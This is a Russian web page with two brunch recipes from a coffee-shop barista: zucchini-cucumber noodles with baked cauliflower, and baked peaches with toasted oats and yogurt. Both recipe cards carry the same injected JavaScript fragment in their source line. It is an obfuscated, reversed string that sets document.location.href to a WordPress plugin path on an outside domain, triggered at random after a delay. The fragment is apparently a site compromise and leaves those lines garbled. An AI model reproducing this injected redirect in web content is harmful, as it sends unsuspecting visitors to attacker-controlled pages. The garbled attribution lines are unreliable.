Воскресный бранч: рецепт от Анастасии Годуновой

Ксюша Камынина продолжает знакомить вас с любимыми рецептами наших героев. Сегодня — вегетарианская лапша из цуккини и огурца и запечённые персики от совладельца и шеф-бариста кофейни Good Enough Анастасии Годуновой.

Воскресный бранч: рецепт от Анастасии Годуновой. Изображение номер 1

Анастасия Годунова

 

Анастасия Годунова

совладелец и шеф-бариста кофейни Good Enough

— Любовь к кухне у меня с самого детства, которое я частично провела в Прибалтике, в Риге. Сравнительно недавно мне очень захотелось привести себя в форму, и я начала правильно питаться и регулярно заниматься спортом. В связи с этим появилось желание готовить здоровую и вкусную еду. Тем более у меня есть отличная возможность делиться этим с людьми в нашей кофейне, где я теперь иногда сама готовлю традиционные воскресные бранчи. Два рецепта с сезонными овощами и фруктами ниже — как раз оттуда.

Лапша из цуккини, огурца с мятой и корн-салатом с запечённой цветной капустой

Воскресный бранч: рецепт от Анастасии Годуновой. Изображение номер 2

Фото: Анастасия Годунова

Воскресный бранч: рецепт от Анастасии Годуновой

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

20 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

100—150 ккал

100 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Цуккини

1 шт.

Огурец

2 шт.

Молодой зелёный горошек

150 г

Корн-салат

100 г

Мята

50 г

Цветная капуста

1 соцветие

Апельсиновый фреш

по вкусу

Оливковое масло

по вкусу

Розовый перец

по вкусу

Тимьян

по вкусу

  1. Нашинкуйте соломкой молодой цуккини и огурец, добавьте стручки горошка, мяту и заправьте по вкусу оливковым маслом и апельсиновым фрешем. Добавьте специи и перемешайте.
  2. Цветную капусту отварите в течение нескольких минут (но не до мягкого состояния), после чего запеките её в духовке с тимьяном до готовности.
  3. Выложите на тарелку корн-салат, добавьте смесь овощей, цветную капусту и подавайте с долькой лимона и ложкой греческого йогурта (по желанию).

Запечённые персики без сахара с сухой овсянкой и греческим йогуртом

Воскресный бранч: рецепт от Анастасии Годуновой. Изображение номер 3

Фото: Анастасия Годунова

Воскресный бранч: рецепт от Анастасии Годуновой

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

25 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

140 ккал

140 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Персик

4 шт.

Овсяные хлопья

400 г

Греческий йогурт

250 г

Мята

10 г

  1. Разрежьте персики пополам и извлеките косточки. Уложите половинки на противень с бортиками, предварительно застеленный пергаментом, и налейте туда немного воды. Запекайте персики в духовке в течение 15—20 минут.
  2. В это время на сухой сковороде на сильном огне, постоянно помешивая, поджарьте овсянку до золотистого цвета и остудите. По вкусу она будет напоминать арахис.
  3. В пиалу положите 4 столовые ложки овсянки, а сверху — нарезанные на дольки запечённые персики. Добавьте пару ложек греческого йогурта и украсьте свежей мятой.

ПАСТА С ЛОСОСЕМ: РЕЦЕПТ ОТ ЕКАТЕРИНЫ ЧУПАХИНОЙ

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector